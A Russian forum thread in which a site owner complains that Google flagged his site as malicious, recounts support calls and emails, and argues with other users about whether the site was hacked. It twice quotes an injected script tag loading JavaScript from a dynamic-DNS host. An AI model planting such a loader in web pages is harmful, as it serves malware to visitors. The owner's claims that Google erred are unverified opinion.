Часовой пояс: UTC + 3 часа

Начать новую тему Новая тема / Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней. Закрыто  Сообщений: 15 
  Версия для печати (полностью) Пред. тема | След. тема 
В случае проблем с отображением форума, отключите блокировщик рекламы
Автор Сообщение

Junior
Статус: Не в сети
Сижу за компом, настроение очень плохое. Гугол мой сайт заблокировал. Пишет вирусы у меня в сайте живут. Позвонил в техподдержку. Телефон для нашей раши один у них на все случаи жизни: 8-800-100-46-64. Дозвонился с 5ого раза. Перед тем как соединить с техподдержкой требуется ввести идентификатор клиента. Вводил все разы правильно, либо отлуп что нет такого, либо сброс. На 5ый раз сработало. Трубу взял какой-то Дмитрий. Спрашивает -
Дмитрий -"В чем проблема?"
Я - "Вы за что мой сайт заблокировали?"
Дмитрий - "Сайт ремонт конфетка?"
Я - "Да!"
Дмитрий - "Он у меня не открывается! Он вообще не рабочий! Его нет!"
Я - "У меня открывается. Сайт рабочий."
Дмитрий - "У тебя вирусы! Мне табличка вылезает!"
Я - "Зайди другим браузером."
Дмитрий - "Причем тут браузер, если не открывается!"
Я - "При том что это хром у тебя!"
Дмитрий - "Ну и что что хром! Сайт то заблокирован в браузере! Значит везде заблокирован! Мы тут ни при чем!"
Я - "Хром принадлежит гуглу. БД одна."
Дмитрий - "При чем тут БД?! Браузер зайти не дает!"
Я - "Потому что вы мой сайт заблокировали!"
Дмитрий - "Мы не можем блокировать ваш браузер!"
Я (уже почти обессилев) - "Открой другим браузером!"
Дмитрий - "Надо же мозилой открылся?! Все равно мне инструмент пишет что у тебя вирусы!"
Я - "Где?"
Дмитрий - "На сайте."
Я - "Где на сайте?"
Дмитрий - "Ссылки дать?"
Я - "Конечно!"
Дмитрий - "Тут 20 ссылок. Через сколько перезвонить когда просмотреть успеете?"
Я - "10-15 минут"
Я - Открываю гугол мыло.
Согласно нашему инструменту, на Вашем сайте присутствуют следующие ссылки, которые считаются вредоносными.

/%D0%94%D0%B8%D0%B7%D0%B0%D0%B9%D0%BD.html,
/images/favicon.ico,
/scripts/bootstrap/css/bootstrap.min.css,
/scripts/bootstrap/img/glyphicons-halflings.png,
/scripts/bootstrap/js/bootstrap.min.js,
/scripts/colorbox/example1/colorbox.css,
/scripts/colorbox/example1/images/border.png,
/scripts/colorbox/example1/images/controls.png,
/scripts/colorbox/example1/images/loading.gif,
/scripts/colorbox/example1/images/loading_background.png,
/scripts/colorbox/example1/images/overlay.png,
/scripts/colorbox/jquery.colorbox.js,
/scripts/jquery/jquery.js,
/scripts/syntaxhighlighter/SyntaxHighlighter.js,
/scripts/syntaxhighlighter/styles/shCoreDefault.css,
/scripts/tiptip/jquery.tipTip.minified.js,
/scripts/tiptip/tipTip.css,
/templates/bootstrap/java/functions.js,
/templates/bootstrap/style/style.css,
/uploads/dizajn-kvartir.jpg

Удалив эти линки, ответьте на это письмо.
Отвечаю на письмо. Хочу поговорить с вашим руководителем, т.к. у меня большие сомнения в вашей компетентности.
Звонит Дмитрий.
Дмитрий - "Боюсь что я не смогу вам ничем помочь в плане разговора с моим руководителем. мы такой услуги не оказываем. Еще вопросы есть?"

На мыло через некоторое время -

Здравствуйте, !

Спасибо, что обратились в службу поддержки AdWords.
Я проверил еще в одном инструменте Ваш сайт и также Ваш сайт считается вредоносным, смотрите скриншот в приложении(к сожалению отчет на анг. языке). Я хочу со своей стороны Вам помочь, но Вы очень негативно настроены.

Пожалуйста пришлите мне скриншот с Вашего веб мастера, показывающий что на Вашем сайте нет вредоносного ПО. Я попробую послать запрос нашим инженерам на рассмотрение этого вопроса, может они смогут предоставить полезную информацию для решения этого вопроса.

Жду от Вас ответа.

В вебмастере: <script type="text/javascript" src="//rdomn1384154103.hopto.me/jquery.js?1384154459">

Шлю линк http://safeweb.norton.com/report/show?u ... onfetka.ru
и скриншот отсюда http://vms.drweb.com/online/

Толку пока ноль. Сайт по прежнему заблокирован. Мало того еще и клиентов всех распугали. :-(((

Партнер

Member
Открыл. Реклама, не?

Junior
initial писал(а):
Открыл. Реклама, не?

Где рекламу увидал? Я статью то зачем писал?

Добавлено спустя 1 минуту 58 секунд:
К тем кто читал мою статью или с кем гугол обошелся так же вопрос - Кроме антирекламы в других сетях и форумах КАК ЕЩЕ МОЖНО ПОДНАСРАТЬ ГУГЛУ?!

Member
karabas123 писал(а):
Где рекламу увидал? Я статью то зачем писал?

А нет, только хром не открывает ваш сайт:
Safari - ok
FF - ok
IE -ok
Opera - ok
Chrome - Fail

Junior
initial писал(а):
А нет, только хром не открывает ваш сайт:
Safari - ok
FF - ok
IE -ok
Opera - ok
Chrome - Fail

Лучше бы посоветовал как гуглу подгадить. Он меня [censored] разорит млять!

Добавлено спустя 3 минуты 47 секунд:
Они в своих непревзойденных способностях нахождения вирей в картинках и стилях (если бы видео было на сайте не сомневаюсь что и в нем бы вирь нашли) самый клинический случай превзошли.

Последний раз редактировалось P.tec 12.11.2013 16:36, всего редактировалось 1 раз.
устное предупреждение. 3.14

Member
Фото: 1
Бабла хотят, однозначно.

Junior
vids писал(а):
Бабла хотят, однозначно.

Видимо хотят еще больше. Только вчера перечислил - они меня через 5 минут в бан!

Добавлено спустя 1 минуту 17 секунд:
Нет пределов жадности гугла! Все из карманов вывернут до копейки!

Advanced member
Не так давно получаю мыло от админа, что на мою страницу наехал гугл. Смотрю беглым взглядом - всё осталось прежним, "что ха [цензура]"? Потом стал глядеть внимательнее, дата файлов изменилась, причем совсем недавно ... т.е. не мной.
Собрался уже идти на терки с ентими рЭбятами из гугла, но, предвидя бессмысленность действа стал разбираться сам. А именно - взял бекап и посмотрел различия - оказалось, что какая-то китайская га[цензура] (это видно по логам) влезла и тупо врезала iframe переде /body. Ссылка шла, есссно, на страницу с [известно чем].
Ну что, вырезал этот бред, благо его не так и много (страницы составлены "руками" и с большой долей пофигизма, а потому /body встречается не в каждом файле).
После вырезания иду в гугл, потом в инструменты и там выдаю запрос на перепроверку и всё. В смысле - всё - сиди и жди СУТКИ. Вот за это их наглую [цензура] надо раскатать не только по столу, а запихнуть в [цензура], по самые гланды. Может и не сутки, а ДЕСЯТОК часов точно придется ждать, пока с сайта снимется клеймо. ОШИЗЕТЬ.
Есссно, на следующий день запрет был снят.
Продолжение - к вечеру того же дня последовало очередное пришествие говна из кэтая, сайт опять оказался в ссылках (см. выше). Поменялась страница, куда указывала ссылка (прошлая была заблокирована). Гугл прочухать это не успел, я вырезал раньше. После чего пошел к админам ... а они и так в курсе, серваки "пошли под update".
Теперь, зачем всё это написал - гугл ссылается на инструменты и еслиб я сразу ими воспользовался, то не потратил пол дня на поиски черной кошки - там указывается и список станиц с ссылками и какой код внедрен, остается лишь его поправить.

Member
Domain blacklisted by Google Safe Browsing
По остальным все чисто

sitecheck
google safebrowsing

Member
Фото: 7
Вот так гугл захватывает мир )

Junior
У меня чисто все. Эти придурки ссылки ставят не на форум а на статью которою только админ править может. Сайт не взломан. Его и х-р сломаешь. Специально такой делал. Никакие инджекты его не возьмут - у него бд вообще нет. Ты предыдущие мои посты прочитай. На что они ссылаются - это уже за гранью глупости. Сайт недавно зарегестрировал в нортоне, получил оценку защищенного и безопасного сайта. Нортон его в режиме реального времени мониторит. Специально прикрутил, чтобы всякие китайцы гадости на форуме не оставляли.

Advanced member
Ну хорошо. Выше приведен список файлов, которые считаются вредоностными.
Теперь вопрос - что_именно обнаружил гугл в этих файлах? Напоминаю, у них в инструментах указывается причины (и подозрения), по которым выставлен признак.

Junior
Вот этой хери что они мне вменяют у меня на сайте нет и небыло никогда <script type="text/javascript" src="//rdomn1384154103.hopto.me/jquery.js?1384154459">

Если конечно супер умный, хитрый и быстрый хакер не удаляет его всякий раз как я захожу на сайт и обратно не прикручивает как только выйду. Не удивлюсь что гугол это придумает в свое оправдание, хотя оправдываться он вряд ли будет. Там же такие спецы сидят, мир вертят.

Advanced member
При моих кривых руках что-то советовать глупо. Почитай, например это обсуждение.

Junior
serj писал(а):
При моих кривых руках что-то советовать глупо. Почитай, например это обсуждение.

Спасибо. Прочитал. Если копать в сторону хостера, полагаю да, возможен глист, который с какой-то периодичностью прописывает. Буду думать насколько это реально. Еще раз спасибо.

Добавлено спустя 16 минут 22 секунды:
Подумал. Если такой хитрый глист существует, все что могу сделать это поменять хостера. Но больше склоняюсь к версии что гугол мне чужие логи прикрутил, учитывая, что все их веб приложения работают через опу и с ошибками.

Добавлено спустя 8 часов 12 минут 10 секунд:
Сайт разблокировали. Лезу в гугол вебмастер - проблемы безопасности. На Вашем сайте обнаружен вредоносный код. Рекомендуем удалить его как можно быстрее. В противном случае, чтобы защитить пользователей от вредоносных программ, при переходе на Ваш сайт со страницы результатов поиска Google будет отображаться соответствующее предупреждение. Вижу 15 страниц. Причем каждые полсекунды адреса 2х-3х страниц меняются. На сайте никого кроме меня нет. Я страницы с такой скорость просто физически не могу просматривать. Быстро тыкнул одну, перешел. Страница как страница. Смотрю код - все чисто. Лезу в панель хостинга. Перелопатил все логи, а бекап срабатывает автоматически при изменениии чего-либо. Ничего в логах нет. Бэкапов новых нет. Вопрос - почему я должен страдать от недоработанности ПО гугла и дебильности его сотрудников?

Добавлено спустя 2 минуты 11 секунд:
Ах да... даже на анонимные прокси перешел и так сайт посмотрел. Думал может вирь такой суперумный, что мой айпи палит. Результат тот же - ничего нет.

Добавлено спустя 2 минуты 27 секунд:
На всякий случай все-же хостеру напишу, для чистой совести.

Добавлено спустя 1 час 34 минуты 15 секунд:
Залез на мыло. Вижу писюлька пришла:

Здравствуйте!

Спасибо, что обратились в службу поддержки AdWords.

Я на данный момент пытаюсь выяснить, что именно система считает вредоносным ПО на Вашем сайте. Как только я получу ответ от наших

коллег, я сразу с Вами свяжусь.

Желаю Вам хорошего дня!

С уважением,

Дмитрий

Задаюсь вопросом - Какую именно из картинок они посчитают наиболее вредоносной и угрожающей безопасности человечества? Будут ли меня судить за изнасилование женской половины швеции? Приговорят ли меня к пожизненному заключению за распространение конфиденциальной информации и методов работы компании гугол?
Иногда интересуюсь контроллерами аурдино. Будет ли гугол теперь считать меня "Доктором зло" за создание терминатора? Веть скайнет то уже отгрохал судя по гуглу.

Добавлено спустя 4 часа 55 минут 47 секунд:
У гугла ребрендинг!

Добавлено спустя 9 минут 18 секунд:
гугол думает

Добавлено спустя 9 минут 51 секунду:
техподдержка гугла.

Добавлено спустя 42 минуты 56 секунд:
Проверил еще раз все файлы по датам - изменений нет
Проверил все скрипты - изменений нет
Зашел программер, проверил скрипты - все нормально
Зашел хостер - проверил акк и сервант - глистов нет
Вопрос - выходит у гугла глисты?

Добавлено спустя 2 часа 17 минут 6 секунд:
еще фото

Добавлено спустя 57 минут 5 секунд:
Сайт по прежнему в бане у них. Удалил акк гугла + все их adwords, аналитики, вебмастера и тд.. Удалил мыло гугла. На счету оставались деньги, их они конечно даже и не думали возвращать. В общем на будущее всем тем, кто решил связаться с шарагой под названием гугол будет реальный пример из жизни. Я его теперь буду стороной обходить, чего и вам советую. :-(

Вложения:
бизнес-гугол.jpg
бизнес-гугол.jpg [ 49.82 КБ | Просмотров: 1562 ]
техподдержка гугла.jpg
техподдержка гугла.jpg [ 7.06 КБ | Просмотров: 1604 ]
гугол-думает.jpg
гугол-думает.jpg [ 56.33 КБ | Просмотров: 1665 ]
Комментарий к файлу: У гугла ребрендинг!
гугол.jpg
гугол.jpg [ 82.7 КБ | Просмотров: 1669 ]
Начать новую тему Новая тема / Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней. Закрыто  Сообщений: 15 
-

Часовой пояс: UTC + 3 часа